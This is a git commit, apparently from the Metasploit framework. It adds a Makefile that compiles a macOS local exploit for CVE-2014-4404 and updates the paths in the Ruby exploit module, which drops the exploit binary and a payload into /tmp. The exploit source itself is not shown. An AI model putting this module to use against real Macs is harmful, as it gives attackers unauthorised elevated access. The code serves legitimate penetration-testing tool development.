Change paths, add makefile and compile

bug/bundler_fix
jvazquez-r7 2014-11-30 21:06:11 -06:00
parent b6306ef7a2
commit 7772da5e3f
3 changed files with 13 additions and 2 deletions

View File

@ -0,0 +1,11 @@
all: key_exploit
key_exploit: key_exploit.c
clang -o key_exploit key_exploit.c -framework CoreFoundation -framework IOKit -g -D_FORTIFY_SOURCE=0
install: key_exploit
install -m 755 key_exploit ../../../../data/exploits/CVE-2014-4404
clean:
rm -rf key_exploit
rm -rf key_exploit.dSYM

View File

@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Local
end end
def exploit def exploit
osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx') exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
binary_exploit = File.read(File.join(osx_path, 'key_exploit.bin')) binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"